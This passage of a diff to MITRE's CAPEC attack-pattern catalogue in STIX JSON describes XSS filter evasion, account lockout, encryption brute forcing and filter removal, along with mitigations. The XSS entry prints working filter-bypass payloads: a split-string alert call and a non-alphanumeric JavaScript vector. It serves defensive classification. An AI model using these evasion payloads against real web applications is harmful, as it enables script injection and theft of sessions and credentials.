"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d30e714c-2b9c-4a0d-95e1-7bf38e3f7c5e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--c79cd2c1-58af-4951-8d6a-8767190e4ecd", + "target_ref": "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: The victim should configure the browser to minimize active content from untrusted sources.", + "id": "course-of-action--7a8e75aa-0acc-4307-99ae-181fbe26a03d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-198-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--201dd0ea-a13e-4039-a9c2-1b28e26c2560", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7a8e75aa-0acc-4307-99ae-181fbe26a03d", + "target_ref": "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses alternate forms of keywords or commands that result in the same action as the primary form but which may not be caught by filters. For example, many keywords are processed in a case insensitive manner. If the site's web filtering algorithm does not convert all tags into a consistent case before the comparison with forbidden keywords it is possible to bypass filters (e.g., incomplete black lists) by using an alternate case structure. 
For example, the \"script\" tag using the alternate forms of \"Script\" or \"ScRiPt\" may bypass filters where \"script\" is the only form tested. Other variants using different syntax representations are also possible as well as using pollution meta-characters or entities that are eventually ignored by the rendering engine. The attack can result in the execution of otherwise prohibited functionality.", + "external_references": [ + { + "external_id": "CAPEC-199", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/199.html" + }, + { + "external_id": "CWE-87", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/87.html" + }, + { + "description": "OWASP Cheatsheets, The Open Web Application Security Project (OWASP)", + "external_id": "REF-69", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/www-community/xss-filter-evasion-cheatsheet" + }, + { + "description": "OWASP Testing Guide (v2), The Open Web Application Security Project (OWASP)", + "external_id": "REF-70", + "source_name": "reference_from_CAPEC", + "url": "http://www.owasp.org/index.php/Testing_for_Cross_site_scripting" + }, + { + "description": "Non-alphanumeric XSS cheat sheet", + "external_id": "REF-71", + "source_name": "reference_from_CAPEC", + "url": "http://sla.ckers.org/forum/read.php?24,28687" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-72", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/Cross-Site+Scripting" + } + ], + "id": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XSS Using Alternate Syntax", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + 
"attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n In this example, the adversary tries to get executed by the victim's browser. The target application employs regular expressions to make sure no script is being passed through the application to the web page; such a regular expression could be ((?i)script), and the application would replace all matches by this regex by the empty string. An adversary will then create a special payload to bypass this filter:\n alert(1)\n when the applications gets this input string, it will replace all \"script\" (case insensitive) by the empty string and the resulting input will be the desired vector by the adversary:\n \n In this example, we assume that the application needs to write a particular string in a client-side JavaScript context (e.g., ). For the adversary to execute the same payload as in the previous example, they would need to send alert(1) if there was no filtering. The application makes use of the following regular expression as filter\n ((\\w+)\\s*\\(.*\\)|alert|eval|function|document)\n and replaces all matches by the empty string. For example each occurrence of alert(), eval(), foo() or even the string \"alert\" would be stripped. 
An adversary will then create a special payload to bypass this filter:\n this['al' + 'ert'](1)\n when the applications gets this input string, it won't replace anything and this piece of JavaScript has exactly the same runtime meaning as alert(1). The adversary could also have used non-alphanumeric XSS vectors to bypass the filter; for example,\n ($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)\n would be executed by the JavaScript engine like alert(1) is.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

  2. Techniques
    Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
    Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Probe identified potential entry points for XSS vulnerability: Possibly using an automated tool, an adversary requests variations on the inputs they surveyed before using alternate syntax. These inputs are designed to bypass incomplete filtering (e.g., incomplete HTML encoding etc.) and try many variations of characters injection that would enable the XSS payload. They record all the responses from the server that include unmodified versions of their script.

  2. Techniques
    Use a list of XSS probe strings to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier. Attempt numerous variations based on form, format, syntax & encoding.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
  3. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

  4. Techniques
    Change a URL parameter to include a malicious script tag created using alternate syntax to bypass filters.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

  2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target client software must allow scripting such as JavaScript." + ], + "x_capec_resources_required": [ + "Ability to send HTTP request to a web application." + ], + "x_capec_skills_required": { + "High": "To bypass non trivial filters in the application", + "Low": "To inject the malicious payload in a web page" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use browser technologies that do not allow client side scripting.", + "id": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7f9249a2-6d3a-425e-9583-820baa614887", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize strict type, character, and encoding enforcement", + "id": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + 
"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b5fa953-0ec5-48c2-b9a3-ea2461650cf6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.", + "id": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8bcece01-19c2-465b-9658-461bae9bfd35", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure all content coming from the client is using the same encoding; if not, the server-side application must canonicalize the data before applying any filtering.", + "id": 
"course-of-action--63ed5cb5-5feb-4677-8623-3c5552f796ee", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8be86371-e989-4042-af5b-bfd78a42085f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--63ed5cb5-5feb-4677-8623-3c5552f796ee", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b307ad0c-ae60-4f03-a5fb-26f4499dc18d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26850710-b983-423b-962a-5fd4b550fa0e", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform output validation for all remote content.", + "id": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--ba695a24-c9fb-4c8a-9012-dc3b1068ec38", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Disable scripting languages such as JavaScript in browser", + "id": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1488d37a-9c10-49ea-bce3-d8270b3b9d2f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. 
Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.", + "id": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b3584936-9e95-48a5-bcca-77b2c2f44e5a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker leverages the security functionality of the system aimed at thwarting potential attacks to launch a denial of service attack against a legitimate system user. Many systems, for instance, implement a password throttling mechanism that locks an account after a certain number of incorrect log in attempts. An attacker can leverage this throttling mechanism to lock a legitimate user out of their own account. 
The weakness that is being leveraged by an attacker is the very security feature that has been put in place to counteract attacks.", + "external_references": [ + { + "external_id": "CAPEC-2", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/2.html" + }, + { + "external_id": "CWE-645", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/645.html" + }, + { + "description": "Account Access Removal", + "external_id": "T1531", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1531" + } + ], + "id": "attack-pattern--4ee9fc30-e736-4f4f-b55b-8a3008214042", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Inducing Account Lockout", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Denial of Service)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A famous example of this type an attack is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder's account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction." + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. Investigate account lockout behavior of system: Investigate the security features present in the system that may trigger an account lockout

  2. Techniques
    Analyze system documentation to find list of events that could potentially cause account lockout
    Obtain user account in system and attempt to lock it out by sending malformed or incorrect data repeatedly
    Determine another user's login ID, and attempt to brute force the password (or other credentials) for it a predetermined number of times, or until the system provides an indication that the account is locked out.
  3. Obtain list of user accounts to lock out: Generate a list of valid user accounts to lock out

  4. Techniques
    Obtain list of authorized users using another attack pattern, such as SQL Injection.
    Attempt to create accounts if possible; system should indicate if a user ID is already taken.
    Attempt to brute force user IDs if system reveals whether a given user ID is valid or not upon failed login attempts.

Exploit

  1. Lock Out Accounts: Perform lockout procedure for all accounts that the attacker wants to lock out.

  2. Techniques
    For each user ID to be locked out, perform the lockout procedure discovered in the first step.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The system has a lockout mechanism.", + "An attacker must be able to reproduce behavior that would result in an account being locked." + ], + "x_capec_resources_required": [ + "Computer with access to the login portion of the target system" + ], + "x_capec_skills_required": { + "Low": "No programming skills or computer knowledge is needed. An attacker can easily use this attack pattern following the Execution Flow above." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement intelligent password throttling mechanisms such as those which take IP address into account, in addition to the login name.", + "id": "course-of-action--5d9b587f-481e-494f-a547-92de65b44c0a", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-2-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--42e9e6ff-2250-40b7-b5c7-26510e85245f", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5d9b587f-481e-494f-a547-92de65b44c0a", + "target_ref": "attack-pattern--4ee9fc30-e736-4f4f-b55b-8a3008214042", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When implementing security features, consider how they can be misused and made to turn on themselves.", + "id": 
"course-of-action--2b357357-88e4-40f9-9345-ada3db593ff5", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-2-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01ecb9a3-1f92-4fc8-879d-f7f3fb7ed660", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2b357357-88e4-40f9-9345-ada3db593ff5", + "target_ref": "attack-pattern--4ee9fc30-e736-4f4f-b55b-8a3008214042", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker, armed with the cipher text and the encryption algorithm used, performs an exhaustive (brute force) search on the key space to determine the key that decrypts the cipher text to obtain the plaintext.", + "external_references": [ + { + "external_id": "CAPEC-20", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-326", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/326.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-1204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1204.html" + } + ], + "id": "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Encryption Brute Forcing", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "In 1997 the original DES challenge used distributed net computing to brute force the encryption key and decrypt the ciphertext to obtain the original plaintext. Each machine was given its own section of the key space to cover. The ciphertext was decrypted in 96 days." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine the ciphertext and the encryption algorithm.

Experiment

  1. Perform an exhaustive brute force search of the key space, producing candidate plaintexts and observing if they make sense.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Ciphertext is known.", + "Encryption algorithm and key size are known." + ], + "x_capec_resources_required": [ + "\n A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge).\n On average, for a binary key of size N, 2^(N/2) trials will be needed to find the key that would decrypt the ciphertext to obtain the original plaintext.\n Obviously as N gets large the brute force approach becomes infeasible.\n " + ], + "x_capec_skills_required": { + "Low": "Brute forcing encryption does not require much skill." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use commonly accepted algorithms and recommended key sizes. 
The key size used will depend on how important it is to keep the data confidential and for how long.", + "id": "course-of-action--14ea1dd8-a232-4071-897a-a930751702bb", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-20-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--439ff02b-9273-4b92-9c82-0a6912ef0dc7", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--14ea1dd8-a232-4071-897a-a930751702bb", + "target_ref": "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In theory a brute force attack performing an exhaustive key space search will always succeed, so the goal is to have computational security. 
Moore's law needs to be taken into account that suggests that computing resources double every eighteen months.", + "id": "course-of-action--8ce2fd56-5e92-4999-b81d-697c7ddb5202", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-20-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--24444738-98cb-4371-b7e9-aba1bd3d11ad", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ce2fd56-5e92-4999-b81d-697c7ddb5202", + "target_ref": "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker removes or disables filtering mechanisms on the target application. Input filters prevent invalid data from being sent to an application (for example, overly large inputs that might cause a buffer overflow or other malformed inputs that may not be correctly handled by an application). 
Input filters might also be designed to constrained executable content.", + "external_references": [ + { + "external_id": "CAPEC-200", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/200.html" + } + ], + "id": "attack-pattern--5c201b0f-aa6f-4220-a544-1e1e7ca8ecf7", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Removal of filters: Input filters, output filters, data masking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, if an application accepts scripting languages as input, an input filter could constrain the commands received and block those that the application's administrator deems to be overly powerful. An output filter screens responses from an application or person in order to prevent disclosure of sensitive information.\n For example, an application's output filter might block output that is sourced to sensitive folders or which contains certain keywords. A data mask is similar to an output filter, but usually applies to structured data, such as found in databases. Data masks elide or replace portions of the information returned from a query in order to protect against the disclosure of sensitive information. If an input filter is removed the attacker will be able to send content to the target and have the target utilize it without it being sanitized. If the content sent by the attacker is executable, the attacker may be able to execute arbitrary commands on the target. If an output filter or data masking mechanism is disabled, the target may send out sensitive information that would otherwise be elided by the filters. If the data mask is disabled, sensitive information stored in a database would be returned unaltered. 
This could result in the disclosure of sensitive information, such as social security numbers of payment records.\n This attack is usually executed as part of a larger attack series. The attacker would disable filters and would then mount additional attacks to either insert commands or data or query the target application in ways that would otherwise be prevented by the filters.\n ", + "x_capec_prerequisites": [ + "The target application must utilize some sort of filtering mechanism (input, output, or data masking)." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary creates a serialized data file (e.g. XML, YAML, etc...) that contains an external data reference. Because serialized data parsers may not validate documents with external references, there may be no checks on the nature of the reference in the external data. 
